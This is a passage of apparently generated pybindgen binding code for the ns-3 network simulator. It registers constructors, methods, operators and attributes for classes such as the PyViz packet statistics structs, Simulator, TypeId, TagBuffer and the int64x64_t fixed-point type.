    cls.add_instance_attribute('lastReceivedPackets', 'std::vector< ns3::PyViz::RxPacketSample >', is_const=False)
    cls.add_instance_attribute('lastTransmittedPackets', 'std::vector< ns3::PyViz::TxPacketSample >', is_const=False)
    return
def register_Ns3PyVizNetDeviceStatistics_methods(root_module, cls):
    """Register bindings for ns3::PyViz::NetDeviceStatistics (pyviz.h, module 'visualizer')."""
    cls.add_constructor([param('ns3::PyViz::NetDeviceStatistics const &', 'arg0')])
    cls.add_constructor([])
    # Per-device byte/packet counters.
    cls.add_instance_attribute('receivedBytes', 'uint64_t', is_const=False)
    cls.add_instance_attribute('receivedPackets', 'uint32_t', is_const=False)
    cls.add_instance_attribute('transmittedBytes', 'uint64_t', is_const=False)
    cls.add_instance_attribute('transmittedPackets', 'uint32_t', is_const=False)
    return
def register_Ns3PyVizNodeStatistics_methods(root_module, cls):
    """Register bindings for ns3::PyViz::NodeStatistics (pyviz.h, module 'visualizer')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PyViz::NodeStatistics const &', 'arg0')])
    # Node id plus its per-device statistics vector.
    cls.add_instance_attribute('nodeId', 'uint32_t', is_const=False)
    cls.add_instance_attribute('statistics', 'std::vector< ns3::PyViz::NetDeviceStatistics >', is_const=False)
    return
def register_Ns3PyVizPacketCaptureOptions_methods(root_module, cls):
    """Register bindings for ns3::PyViz::PacketCaptureOptions (pyviz.h, module 'visualizer')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PyViz::PacketCaptureOptions const &', 'arg0')])
    # Capture configuration: header type filter, capture mode, history depth.
    cls.add_instance_attribute('headers', 'std::set< ns3::TypeId >', is_const=False)
    cls.add_instance_attribute('mode', 'ns3::PyViz::PacketCaptureMode', is_const=False)
    cls.add_instance_attribute('numLastPackets', 'uint32_t', is_const=False)
    return
def register_Ns3PyVizPacketDropSample_methods(root_module, cls):
    """Register bindings for ns3::PyViz::PacketDropSample (pyviz.h, module 'visualizer')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PyViz::PacketDropSample const &', 'arg0')])
    cls.add_instance_attribute('bytes', 'uint32_t', is_const=False)
    cls.add_instance_attribute('transmitter', 'ns3::Ptr< ns3::Node >', is_const=False)
    return
def register_Ns3PyVizPacketSample_methods(root_module, cls):
    """Register bindings for ns3::PyViz::PacketSample (pyviz.h, module 'visualizer')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PyViz::PacketSample const &', 'arg0')])
    # Which device saw which packet, and when.
    cls.add_instance_attribute('device', 'ns3::Ptr< ns3::NetDevice >', is_const=False)
    cls.add_instance_attribute('packet', 'ns3::Ptr< ns3::Packet >', is_const=False)
    cls.add_instance_attribute('time', 'ns3::Time', is_const=False)
    return
def register_Ns3PyVizRxPacketSample_methods(root_module, cls):
    """Register bindings for ns3::PyViz::RxPacketSample (pyviz.h, module 'visualizer')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PyViz::RxPacketSample const &', 'arg0')])
    # Source MAC address of the received packet.
    cls.add_instance_attribute('from', 'ns3::Mac48Address', is_const=False)
    return
def register_Ns3PyVizTransmissionSample_methods(root_module, cls):
    """Register bindings for ns3::PyViz::TransmissionSample (pyviz.h, module 'visualizer')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PyViz::TransmissionSample const &', 'arg0')])
    # Byte count plus the channel and endpoint nodes of the transmission.
    cls.add_instance_attribute('bytes', 'uint32_t', is_const=False)
    cls.add_instance_attribute('channel', 'ns3::Ptr< ns3::Channel >', is_const=False)
    cls.add_instance_attribute('receiver', 'ns3::Ptr< ns3::Node >', is_const=False)
    cls.add_instance_attribute('transmitter', 'ns3::Ptr< ns3::Node >', is_const=False)
    return
def register_Ns3PyVizTxPacketSample_methods(root_module, cls):
    """Register bindings for ns3::PyViz::TxPacketSample (pyviz.h, module 'visualizer')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PyViz::TxPacketSample const &', 'arg0')])
    # Destination MAC address of the transmitted packet.
    cls.add_instance_attribute('to', 'ns3::Mac48Address', is_const=False)
    return
def register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, cls):
    """Register bindings for ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> (simple-ref-count.h, module 'core')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return
def register_Ns3Simulator_methods(root_module, cls):
    """Register bindings for ns3::Simulator (simulator.h, module 'core').

    All bound member functions are static; only the copy constructor is bound.
    """
    cls.add_constructor([param('ns3::Simulator const &', 'arg0')])
    # Event management.
    cls.add_method('Cancel', 'void', [param('ns3::EventId const &', 'id')], is_static=True)
    cls.add_method('Destroy', 'void', [], is_static=True)
    cls.add_method('Remove', 'void', [param('ns3::EventId const &', 'id')], is_static=True)
    cls.add_method('IsExpired', 'bool', [param('ns3::EventId const &', 'id')], is_static=True)
    # Queries.
    cls.add_method('GetContext', 'uint32_t', [], is_static=True)
    cls.add_method('GetDelayLeft', 'ns3::Time', [param('ns3::EventId const &', 'id')], is_static=True)
    cls.add_method('GetImplementation', 'ns3::Ptr< ns3::SimulatorImpl >', [], is_static=True)
    cls.add_method('GetMaximumSimulationTime', 'ns3::Time', [], is_static=True)
    cls.add_method('GetSystemId', 'uint32_t', [], is_static=True)
    cls.add_method('IsFinished', 'bool', [], is_static=True)
    cls.add_method('Now', 'ns3::Time', [], is_static=True)
    # Next() and RunOneEvent() carry the deprecated flag in the scanned API.
    cls.add_method('Next', 'ns3::Time', [], is_static=True, deprecated=True)
    cls.add_method('RunOneEvent', 'void', [], is_static=True, deprecated=True)
    # Configuration.
    cls.add_method('SetImplementation', 'void', [param('ns3::Ptr< ns3::SimulatorImpl >', 'impl')], is_static=True)
    cls.add_method('SetScheduler', 'void', [param('ns3::ObjectFactory', 'schedulerFactory')], is_static=True)
    # Stop() is overloaded: stop now, or stop at the given simulation time.
    cls.add_method('Stop', 'void', [], is_static=True)
    cls.add_method('Stop', 'void', [param('ns3::Time const &', 'time')], is_static=True)
    return
def register_Ns3Tag_methods(root_module, cls):
    """Register bindings for ns3::Tag (tag.h, module 'network'), an abstract serializable tag base class."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Tag const &', 'arg0')])
    # Pure-virtual serialization interface that concrete tags must implement.
    cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_pure_virtual=True, is_const=True, is_virtual=True)
    # static ns3::TypeId GetTypeId()
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    return
def register_Ns3TagBuffer_methods(root_module, cls):
    """Register bindings for ns3::TagBuffer (tag-buffer.h, module 'network')."""
    cls.add_constructor([param('ns3::TagBuffer const &', 'arg0')])
    cls.add_constructor([param('uint8_t *', 'start'), param('uint8_t *', 'end')])
    cls.add_method('CopyFrom', 'void', [param('ns3::TagBuffer', 'o')])
    cls.add_method('TrimAtEnd', 'void', [param('uint32_t', 'trim')])
    # Readers: raw bytes plus fixed-width integer/double accessors.
    cls.add_method('Read', 'void', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
    cls.add_method('ReadDouble', 'double', [])
    cls.add_method('ReadU16', 'uint16_t', [])
    cls.add_method('ReadU32', 'uint32_t', [])
    cls.add_method('ReadU64', 'uint64_t', [])
    cls.add_method('ReadU8', 'uint8_t', [])
    # Writers mirroring the readers.
    cls.add_method('Write', 'void', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
    cls.add_method('WriteDouble', 'void', [param('double', 'v')])
    cls.add_method('WriteU16', 'void', [param('uint16_t', 'data')])
    cls.add_method('WriteU32', 'void', [param('uint32_t', 'data')])
    cls.add_method('WriteU64', 'void', [param('uint64_t', 'v')])
    cls.add_method('WriteU8', 'void', [param('uint8_t', 'v')])
    return
def register_Ns3TypeId_methods(root_module, cls):
    """Register the ns3::TypeId API on the pybindgen class wrapper ``cls``.

    Adds comparison/output-stream operators, the constructors, and every
    public TypeId member function (attribute/trace-source registration,
    lookup, and introspection methods).

    NOTE(review): this looks like pybindgen-generated binding code --
    regenerate via the API scan rather than editing by hand; overload
    registration order is presumably significant to wrapper dispatch.
    """
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    ## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
    cls.add_constructor([param('char const *', 'name')])
    ## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
    cls.add_constructor([])
    ## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
    cls.add_constructor([param('ns3::TypeId const &', 'o')])
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('AddAttribute',
                   'ns3::TypeId',
                   [param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('AddAttribute',
                   'ns3::TypeId',
                   [param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
    cls.add_method('AddTraceSource',
                   'ns3::TypeId',
                   [param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
    cls.add_method('GetAttribute',
                   'ns3::TypeId::AttributeInformation',
                   [param('uint32_t', 'i')],
                   is_const=True)
    ## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
    cls.add_method('GetAttributeFullName',
                   'std::string',
                   [param('uint32_t', 'i')],
                   is_const=True)
    ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
    cls.add_method('GetAttributeN',
                   'uint32_t',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
    cls.add_method('GetConstructor',
                   'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
    cls.add_method('GetGroupName',
                   'std::string',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
    cls.add_method('GetName',
                   'std::string',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
    cls.add_method('GetParent',
                   'ns3::TypeId',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
    cls.add_method('GetRegistered',
                   'ns3::TypeId',
                   [param('uint32_t', 'i')],
                   is_static=True)
    ## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
    cls.add_method('GetRegisteredN',
                   'uint32_t',
                   [],
                   is_static=True)
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
    cls.add_method('GetTraceSource',
                   'ns3::TypeId::TraceSourceInformation',
                   [param('uint32_t', 'i')],
                   is_const=True)
    ## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
    cls.add_method('GetTraceSourceN',
                   'uint32_t',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
    cls.add_method('GetUid',
                   'uint16_t',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
    cls.add_method('HasConstructor',
                   'bool',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
    cls.add_method('HasParent',
                   'bool',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
    cls.add_method('HideFromDocumentation',
                   'ns3::TypeId',
                   [])
    ## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
    cls.add_method('IsChildOf',
                   'bool',
                   [param('ns3::TypeId', 'other')],
                   is_const=True)
    ## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
    cls.add_method('LookupAttributeByName',
                   'bool',
                   [param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info')],
                   is_const=True)
    ## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
    cls.add_method('LookupByName',
                   'ns3::TypeId',
                   [param('std::string', 'name')],
                   is_static=True)
    ## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
    cls.add_method('LookupTraceSourceByName',
                   'ns3::Ptr< ns3::TraceSourceAccessor const >',
                   [param('std::string', 'name')],
                   is_const=True)
    ## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
    cls.add_method('MustHideFromDocumentation',
                   'bool',
                   [],
                   is_const=True)
    ## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
    cls.add_method('SetAttributeInitialValue',
                   'bool',
                   [param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
    cls.add_method('SetGroupName',
                   'ns3::TypeId',
                   [param('std::string', 'groupName')])
    ## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
    cls.add_method('SetParent',
                   'ns3::TypeId',
                   [param('ns3::TypeId', 'tid')])
    ## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
    cls.add_method('SetUid',
                   'void',
                   [param('uint16_t', 'tid')])
    return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
    """Register the ns3::TypeId::AttributeInformation struct on ``cls``.

    Adds the default/copy constructors and exposes each public data member
    as a mutable instance attribute.

    NOTE(review): presumably pybindgen-generated -- regenerate rather than
    hand-edit.
    """
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
    cls.add_constructor([])
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
    cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
    cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
    cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
    cls.add_instance_attribute('help', 'std::string', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
    cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
    cls.add_instance_attribute('name', 'std::string', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
    cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
    return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
    """Register the ns3::TypeId::TraceSourceInformation struct on ``cls``.

    Adds the default/copy constructors and exposes the accessor/help/name
    data members as mutable instance attributes.
    """
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
    cls.add_constructor([])
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
    cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
    cls.add_instance_attribute('help', 'std::string', is_const=False)
    ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
    cls.add_instance_attribute('name', 'std::string', is_const=False)
    return
def register_Ns3Empty_methods(root_module, cls):
    """Register the ns3::empty placeholder type on ``cls``.

    Only the default and copy constructors exist; the type carries no state.
    """
    ## empty.h (module 'core'): ns3::empty::empty() [constructor]
    cls.add_constructor([])
    ## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::empty const &', 'arg0')])
    return
def register_Ns3Int64x64_t_methods(root_module, cls):
    """Register the ns3::int64x64_t fixed-point type on ``cls``.

    Adds the full arithmetic operator set ('*', '+', '-', '/' against every
    integral width, double, and int64x64_t itself), unary minus, in-place
    operators, comparisons, stream output, the numeric constructors, and the
    GetDouble/GetHigh/GetLow/Invert/MulByInvert member functions.

    NOTE(review): presumably pybindgen-generated; the per-operand-type
    overload ladder order likely matters to wrapper dispatch -- regenerate
    rather than reorder by hand.
    """
    cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
    cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
    cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
    cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
    cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
    cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
    cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
    cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
    cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
    cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
    cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
    cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
    cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
    cls.add_unary_numeric_operator('-')
    cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
    cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('>')
    cls.add_binary_comparison_operator('!=')
    cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', 'right'))
    cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', 'right'))
    cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', 'right'))
    cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', 'right'))
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('<=')
    cls.add_binary_comparison_operator('==')
    cls.add_binary_comparison_operator('>=')
    ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor]
    cls.add_constructor([])
    ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor]
    cls.add_constructor([param('double', 'v')])
    ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor]
    cls.add_constructor([param('int', 'v')])
    ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) [constructor]
    cls.add_constructor([param('long int', 'v')])
    ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor]
    cls.add_constructor([param('long long int', 'v')])
    ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor]
    cls.add_constructor([param('unsigned int', 'v')])
    ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor]
    cls.add_constructor([param('long unsigned int', 'v')])
    ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor]
    cls.add_constructor([param('long long unsigned int', 'v')])
    ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor]
    cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')])
    ## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor]
    cls.add_constructor([param('ns3::int64x64_t const &', 'o')])
    ## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function]
    cls.add_method('GetDouble',
                   'double',
                   [],
                   is_const=True)
    ## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function]
    cls.add_method('GetHigh',
                   'int64_t',
                   [],
                   is_const=True)
    ## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function]
    cls.add_method('GetLow',
                   'uint64_t',
                   [],
                   is_const=True)
    ## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function]
    cls.add_method('Invert',
                   'ns3::int64x64_t',
                   [param('uint64_t', 'v')],
                   is_static=True)
    ## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function]
    cls.add_method('MulByInvert',
                   'void',
                   [param('ns3::int64x64_t const &', 'o')])
    return
def register_Ns3Chunk_methods(root_module, cls):
    """Register the abstract ns3::Chunk base class on ``cls``.

    Deserialize and Print are registered as pure-virtual so Python
    subclasses must override them; GetTypeId is static.
    """
    ## chunk.h (module 'network'): ns3::Chunk::Chunk() [constructor]
    cls.add_constructor([])
    ## chunk.h (module 'network'): ns3::Chunk::Chunk(ns3::Chunk const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Chunk const &', 'arg0')])
    ## chunk.h (module 'network'): uint32_t ns3::Chunk::Deserialize(ns3::Buffer::Iterator start) [member function]
    cls.add_method('Deserialize',
                   'uint32_t',
                   [param('ns3::Buffer::Iterator', 'start')],
                   is_pure_virtual=True, is_virtual=True)
    ## chunk.h (module 'network'): static ns3::TypeId ns3::Chunk::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## chunk.h (module 'network'): void ns3::Chunk::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3Header_methods(root_module, cls):
    """Register the abstract ns3::Header base class on ``cls``.

    Adds stream output, the constructors, and the pure-virtual
    Deserialize/GetSerializedSize/Print/Serialize interface that concrete
    header types implement, plus the static GetTypeId.
    """
    cls.add_output_stream_operator()
    ## header.h (module 'network'): ns3::Header::Header() [constructor]
    cls.add_constructor([])
